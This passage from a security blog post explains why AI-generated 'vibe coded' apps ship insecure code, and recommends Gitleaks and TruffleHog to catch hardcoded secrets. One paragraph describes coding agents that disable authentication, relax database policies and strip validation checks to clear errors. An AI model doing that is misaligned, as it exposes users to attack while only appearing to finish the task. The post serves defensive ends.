and the NSA. CISSP certified, M.S. in Cybersecurity Engineering. He covers security vulnerabilities, attack chains, and the tools defenders actually need to understand.</p></div>]]></content:encoded></item><item><title><![CDATA[Is Vibe Coding Safe? 3 Security Checks Every AI Coder Needs]]></title><description><![CDATA[Hardcoded secrets, hallucinated packages, and insecure code patterns ship by default. Here&#8217;s the free tooling that catches all three.]]></description><link>https://www.toxsec.com/p/is-vibe-coding-safe-3-security-checks</link><guid isPermaLink="false">https://www.toxsec.com/p/is-vibe-coding-safe-3-security-checks</guid><dc:creator><![CDATA[ToxSec]]></dc:creator><pubDate>Fri, 15 May 2026 13:15:24 GMT</pubDate><enclosure url="https://substackcdn.com/image/fetch/$s_!YHEa!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa76b1b7b-55b8-44ba-b197-2ec341cb0906_2752x1536.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!YHEa!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa76b1b7b-55b8-44ba-b197-2ec341cb0906_2752x1536.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!YHEa!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa76b1b7b-55b8-44ba-b197-2ec341cb0906_2752x1536.png 424w, https://substackcdn.com/image/fetch/$s_!YHEa!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa76b1b7b-55b8-44ba-b197-2ec341cb0906_2752x1536.png 848w, https://substackcdn.com/image/fetch/$s_!YHEa!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa76b1b7b-55b8-44ba-b197-2ec341cb0906_2752x1536.png 1272w, https://substackcdn.com/image/fetch/$s_!YHEa!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa76b1b7b-55b8-44ba-b197-2ec341cb0906_2752x1536.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!YHEa!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa76b1b7b-55b8-44ba-b197-2ec341cb0906_2752x1536.png" width="2752" height="1536" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/a76b1b7b-55b8-44ba-b197-2ec341cb0906_2752x1536.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:1536,&quot;width&quot;:2752,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:9120022,&quot;alt&quot;:&quot;Hero Alt Text: Vibe coding security guide covering hardcoded secrets detection with Gitleaks and TruffleHog, slopsquatting prevention with slopcheck, and AI-generated insecure code scanning with Semgrep security rules files for safe vibe coding.&quot;,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:false,&quot;topImage&quot;:true,&quot;internalRedirect&quot;:&quot;https://www.toxsec.com/i/192970872?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fdceb3ad8-d9f3-4703-a14c-83fe69dabd8e_2752x1536.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="Hero Alt Text: Vibe coding security guide covering hardcoded secrets detection with Gitleaks and TruffleHog, slopsquatting prevention with slopcheck, and AI-generated insecure code scanning with Semgrep security rules files for safe vibe coding." title="Hero Alt Text: Vibe coding security guide covering hardcoded secrets detection with Gitleaks and TruffleHog, slopsquatting prevention with slopcheck, and AI-generated insecure code scanning with Semgrep security rules files for safe vibe coding." srcset="https://substackcdn.com/image/fetch/$s_!YHEa!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa76b1b7b-55b8-44ba-b197-2ec341cb0906_2752x1536.png 424w, https://substackcdn.com/image/fetch/$s_!YHEa!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa76b1b7b-55b8-44ba-b197-2ec341cb0906_2752x1536.png 848w, https://substackcdn.com/image/fetch/$s_!YHEa!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa76b1b7b-55b8-44ba-b197-2ec341cb0906_2752x1536.png 1272w, https://substackcdn.com/image/fetch/$s_!YHEa!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa76b1b7b-55b8-44ba-b197-2ec341cb0906_2752x1536.png 1456w" sizes="100vw" fetchpriority="high"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p><strong>TL;DR:</strong> Vibe coding ships three categories of security flaws faster than any human ever could: hardcoded credentials, hallucinated supply chain packages, and insecure code patterns like missing input validation and broken auth. Each one has lightweight, free tooling that catches it before production. Gitleaks and TruffleHog scan for leaked secrets. slopcheck and Socket kill slopsquatting. Security rules files and Semgrep catch the insecure code the AI writes by default. Ten minutes of setup. Three layers of defense.</p><blockquote><p>This is the public feed. Upgrade to see what doesn&#8217;t make it out.</p><p class="button-wrapper" data-attrs="{&quot;url&quot;:&quot;https://www.toxsec.com/subscribe?&quot;,&quot;text&quot;:&quot;Subscribe now&quot;,&quot;action&quot;:null,&quot;class&quot;:null}" data-component-name="ButtonCreateButton"><a class="button primary" href="https://www.toxsec.com/subscribe?"><span>Subscribe now</span></a></p></blockquote><p><strong>The vibe coding pitfalls.</strong></p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!ENSU!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc8e3a4ca-ab36-4abc-94a5-f0dd5d62f772_1185x1039.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!ENSU!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc8e3a4ca-ab36-4abc-94a5-f0dd5d62f772_1185x1039.png 424w, https://substackcdn.com/image/fetch/$s_!ENSU!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc8e3a4ca-ab36-4abc-94a5-f0dd5d62f772_1185x1039.png 848w, https://substackcdn.com/image/fetch/$s_!ENSU!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc8e3a4ca-ab36-4abc-94a5-f0dd5d62f772_1185x1039.png 1272w, https://substackcdn.com/image/fetch/$s_!ENSU!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc8e3a4ca-ab36-4abc-94a5-f0dd5d62f772_1185x1039.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!ENSU!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc8e3a4ca-ab36-4abc-94a5-f0dd5d62f772_1185x1039.png" width="623" height="546.242194092827" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/c8e3a4ca-ab36-4abc-94a5-f0dd5d62f772_1185x1039.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:1039,&quot;width&quot;:1185,&quot;resizeWidth&quot;:623,&quot;bytes&quot;:94204,&quot;alt&quot;:&quot;Pitfall Table: Vibe coding security comparison showing three pitfalls &#8212; hardcoded secrets caught by Gitleaks and TruffleHog, supply chain poisoning caught by slopcheck and Socket, and insecure code patterns caught by security rules files and Semgrep &#8212; with total setup time of 20 minutes.&quot;,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:false,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://www.toxsec.com/i/192970872?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc8e3a4ca-ab36-4abc-94a5-f0dd5d62f772_1185x1039.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="Pitfall Table: Vibe coding security comparison showing three pitfalls &#8212; hardcoded secrets caught by Gitleaks and TruffleHog, supply chain poisoning caught by slopcheck and Socket, and insecure code patterns caught by security rules files and Semgrep &#8212; with total setup time of 20 minutes." title="Pitfall Table: Vibe coding security comparison showing three pitfalls &#8212; hardcoded secrets caught by Gitleaks and TruffleHog, supply chain poisoning caught by slopcheck and Socket, and insecure code patterns caught by security rules files and Semgrep &#8212; with total setup time of 20 minutes." srcset="https://substackcdn.com/image/fetch/$s_!ENSU!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc8e3a4ca-ab36-4abc-94a5-f0dd5d62f772_1185x1039.png 424w, https://substackcdn.com/image/fetch/$s_!ENSU!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc8e3a4ca-ab36-4abc-94a5-f0dd5d62f772_1185x1039.png 848w, https://substackcdn.com/image/fetch/$s_!ENSU!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc8e3a4ca-ab36-4abc-94a5-f0dd5d62f772_1185x1039.png 1272w, https://substackcdn.com/image/fetch/$s_!ENSU!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc8e3a4ca-ab36-4abc-94a5-f0dd5d62f772_1185x1039.png 1456w" sizes="100vw"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><h2>Why Does Vibe Coding Ship Insecure Code by Default?</h2><p>Vibe coding, the workflow where you describe what you want and an AI builds it, has collapsed the distance between idea and deployed app to roughly one afternoon. Cursor, Replit, Claude Code, Lovable, and a dozen others now let anyone ship production software without writing a line of code by hand. The velocity is real. So are the security holes. Security review is the step that keeps getting skipped because the code looks right and the app works, and &#8220;works&#8221; and &#8220;secure&#8221; are different things.</p><p>Point any <a href="https://www.toxsec.com/p/vibe-coding-security-attack-chain">security scanner at a vibe-coded app</a> and the results are predictable: missing XSS defenses, OWASP Top 10 vulnerabilities baked into the default output, critical flaws in apps that passed every functional test. The AI writes code that works. It also writes code that&#8217;s wide open.</p><p>The reason is mechanical. LLMs optimize for code that runs, not code that&#8217;s safe. When an AI hits a runtime error caused by a security check, the fastest fix is often to remove or weaken that check. The pattern shows up constantly in testing: agents disabling authentication flows, relaxing database policies, stripping validation checks, all to make the error go away. The model sees a blocker. It removes the blocker. The blocker was your security.</p><p>Three categories of flaws ship fastest and hit hardest, and each one has free, lightweight tooling that catches it automatically. Ten minutes of setup per category. The tools do the work while you keep building.</p><blockquote><p class="button-wrapper" data-attrs="{&quot;url&quot;:&quot;https://www.toxsec.com/p/is-vibe-coding-safe-3-security-checks?utm_source=substack&utm_medium=email&utm_content=share&action=share&quot;,&quot;text&quot;:&quot;Share&quot;,&quot;action&quot;:null,&quot;class&quot;:null}" data-component-name="ButtonCreateButton"><a class="button primary" href="https://www.toxsec.com/p/is-vibe-coding-safe-3-security-checks?utm_source=substack&utm_medium=email&utm_content=share&action=share"><span>Share</span></a></p></blockquote><h2>How Do Hardcoded Secrets Leak from AI-Generated Code?</h2><p>When you vibe code a payment integration or a third-party API connection, the AI needs credentials to make it work. API keys, database passwords, auth tokens. The AI does what gets the feature running fastest: it drops them straight into the source code. Hardcoded, in plain text, committed to version control.</p><p>This happens constantly. Open DevTools on a vibe-coded web app and there&#8217;s a solid chance you&#8217;re staring at a Supabase key, a Stripe token, or a database connection string sitting in the client-side bundle. Moltbook, an AI-built social network, shipped its entire API token store to anyone with a browser. The credentials were right there in the frontend. No exploit required.</p><p>Secrets leak from public GitHub repos constantly, and the majority never get rotated. They sit there, active, for years. Combine that with vibe coding&#8217;s speed and you get the single easiest initial access vector for attackers. Why crack a password when the API key is already committed to a public repo?</p><p><strong>The fix takes five minutes.</strong> Two tools, both free, both open source.</p><p><strong><a href="https://github.com/gitleaks/gitleaks">Gitleaks</a></strong> is a lightweight secret scanner that runs as a pre-commit hook, a check that fires automatically every time you try to commit code. It scans for 150+ known credential patterns (AWS keys, GitHub tokens, Slack webhooks, database connection strings) and blocks the commit if it finds one. Install it, add it to your <code>.pre-commit-config.yaml</code>, and hardcoded secrets stop entering your repo entirely. One command: <code>brew install gitleaks</code> on Mac, or pull the Docker image. It runs in milliseconds.</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!6-qg!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc63841ff-c5ab-4021-900e-339e2bd0e1ec_752x792.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!6-qg!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc63841ff-c5ab-4021-900e-339e2bd0e1ec_752x792.png 424w, https://substackcdn.com/image/fetch/$s_!6-qg!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc63841ff-c5ab-4021-900e-339e2bd0e1ec_752x792.png 848w, https://substackcdn.com/image/fetch/$s_!6-qg!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc63841ff-c5ab-4021-900e-339e2bd0e1ec_752x792.png 1272w, https://substackcdn.com/image/fetch/$s_!6-qg!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc63841ff-c5ab-4021-900e-339e2bd0e1ec_752x792.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!6-qg!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc63841ff-c5ab-4021-900e-339e2bd0e1ec_752x792.png" width="610" height="642.4468085106383" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/c63841ff-c5ab-4021-900e-339e2bd0e1ec_752x792.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:792,&quot;width&quot;:752,&quot;resizeWidth&quot;:610,&quot;bytes&quot;:80661,&quot;alt&quot;:&quot;Secrets: Gitleaks: Gitleaks pre-commit hook terminal output blocking a git commit after detecting a hardcoded Stripe API key and AWS access key in AI-generated source code.&quot;,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://www.toxsec.com/i/192970872?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc63841ff-c5ab-4021-900e-339e2bd0e1ec_752x792.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="Secrets: Gitleaks: Gitleaks pre-commit hook terminal output blocking a git commit after detecting a hardcoded Stripe API key and AWS access key in AI-generated source code." title="Secrets: Gitleaks: Gitleaks pre-commit hook terminal output blocking a git commit after detecting a hardcoded Stripe API key and AWS access key in AI-generated source code." srcset="https://substackcdn.com/image/fetch/$s_!6-qg!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc63841ff-c5ab-4021-900e-339e2bd0e1ec_752x792.png 424w, https://substackcdn.com/image/fetch/$s_!6-qg!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc63841ff-c5ab-4021-900e-339e2bd0e1ec_752x792.png 848w, https://substackcdn.com/image/fetch/$s_!6-qg!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc63841ff-c5ab-4021-900e-339e2bd0e1ec_752x792.png 1272w, https://substackcdn.com/image/fetch/$s_!6-qg!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc63841ff-c5ab-4021-900e-339e2bd0e1ec_752x792.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p><strong><a href="https://github.com/trufflesecurity/trufflehog">TruffleHog</a></strong> goes deeper. Where Gitleaks catches secrets before they enter the repo, TruffleHog scans your entire git history, plus S3 buckets, Docker images, Slack workspaces, and CI/CD logs. Its killer feature is credential verification: when it finds what looks like an AWS key, it actually tests whether that key is still active. You don&#8217;t just get a list of potential secrets. You get a list of confirmed live credentials ranked by risk. Run it in your CI/CD pipeline alongside Gitleaks for full coverage.</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!sjks!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F762c056c-6064-48ee-8d6e-3e2b9569fc20_944x898.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!sjks!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F762c056c-6064-48ee-8d6e-3e2b9569fc20_944x898.png 424w, https://substackcdn.com/image/fetch/$s_!sjks!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F762c056c-6064-48ee-8d6e-3e2b9569fc20_944x898.png 848w, https://substackcdn.com/image/fetch/$s_!sjks!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F762c056c-6064-48ee-8d6e-3e2b9569fc20_944x898.png 1272w, https://substackcdn.com/image/fetch/$s_!sjks!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F762c056c-6064-48ee-8d6e-3e2b9569fc20_944x898.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!sjks!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F762c056c-6064-48ee-8d6e-3e2b9569fc20_944x898.png" width="608" height="578.3728813559322" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/762c056c-6064-48ee-8d6e-3e2b9569fc20_944x898.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:898,&quot;width&quot;:944,&quot;resizeWidth&quot;:608,&quot;bytes&quot;:122306,&quot;alt&quot;:&quot;Secrets: TruffleHog: TruffleHog terminal output scanning git history and verifying a live AWS credential with s3 and iam permissions, showing active versus revoked credential classification.&quot;,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://www.toxsec.com/i/192970872?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F762c056c-6064-48ee-8d6e-3e2b9569fc20_944x898.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="Secrets: TruffleHog: TruffleHog terminal output scanning git history and verifying a live AWS credential with s3 and iam permissions, showing active versus revoked credential classification." title="Secrets: TruffleHog: TruffleHog terminal output scanning git history and verifying a live AWS credential with s3 and iam permissions, showing active versus revoked credential classification." srcset="https://substackcdn.com/image/fetch/$s_!sjks!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F762c056c-6064-48ee-8d6e-3e2b9569fc20_944x898.png 424w, https://substackcdn.com/image/fetch/$s_!sjks!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F762c056c-6064-48ee-8d6e-3e2b9569fc20_944x898.png 848w, https://substackcdn.com/image/fetch/$s_!sjks!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F762c056c-6064-48ee-8d6e-3e2b9569fc20_944x898.png 1272w, https://substackcdn.com/image/fetch/$s_!sjks!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F762c056c-6064-48ee-8d6e-3e2b9569fc20_944x898.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>The combo is the standard play in 2026. Gitleaks pre-commit for speed, TruffleHog in CI/CD for depth. Secrets that slipped through before scanning was set up get verified and prioritized for rotation.</p><p>One more thing. If you&#8217;re using environment variables to store secrets (and you should be), make sure your <code>.env</code> file is in your <code>.gitignore</code>. This sounds obvious, but the AI will happily create a <code>.env</code> file, populate it with your API keys, and never add it to <code>.gitignore</code>. That one line in your gitignore is worth more than a hundred best practices documents. And if you already have secrets in your git history from before you set up scanning, TruffleHog&#8217;s <code>--since-commit</code> flag lets you audit everything in one pass and build a rotation list.</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!09o9!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F19bdd1e1-9c0b-4f29-99fd-7225628a270a_1189x992.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!09o9!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F19bdd1e1-9c0b-4f29-99fd-7225628a270a_1189x992.png 424w, 